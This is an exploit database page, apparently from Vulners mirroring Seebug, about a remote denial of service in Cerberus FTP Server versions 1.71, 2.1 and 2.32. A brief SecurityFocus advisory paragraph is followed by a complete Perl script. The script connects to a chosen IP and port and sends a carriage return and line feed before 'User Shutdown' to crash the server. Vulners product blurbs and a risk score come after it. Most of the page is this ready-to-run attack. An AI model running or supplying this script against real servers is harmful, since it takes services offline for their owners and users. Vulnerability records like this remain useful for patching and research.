Lucene search
+L

Cerberus FTPServer 1.71/2.1/2.32 Remote Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

Cerberus FTPServer Remote DoS Vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/8452/info

It has been reported that some versions of Cerberus FTP Server may be prone to remote denial of service attacks. The problem is said to occur when the order of a carriage return and line feed are prefixed to a specific command, rather then appended. When this data is interpreted by the FTP server, the application supposedly crashes. The precise technical details regarding where the issue lies and why it occurs are currently unknown. This BID will be updated as further information becomes available. 

  print "Exploit for FTP-Server\n";
  print "   by The real Remoter\n";
  my $usage = "\nftpcrash <IP> <Port>\n";
  die "$usage" unless $ARGV[0] && $ARGV[1];
  use Socket;
  my $remote = $ARGV[0];
  my $port = $ARGV[1];
  my $iaddr = inet_aton($remote);
  my $proto = getprotobyname("tcp");
  my $paddr = sockaddr_in($port, $iaddr);
  socket(SOCK, PF_INET, SOCK_STREAM, $proto);
  connect(SOCK, $paddr) or die "Can't connect to " . $remote;
  print "Sending exploit\n";
  $msg = "\x0d\x0a";
  $msg = $msg . "User Shutdown";
  send(SOCK,$msg, 0) or die "Can't send Exploit";
  sleep(1);
  print "Server Crashed!";
  sleep(1);
  exit;


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
21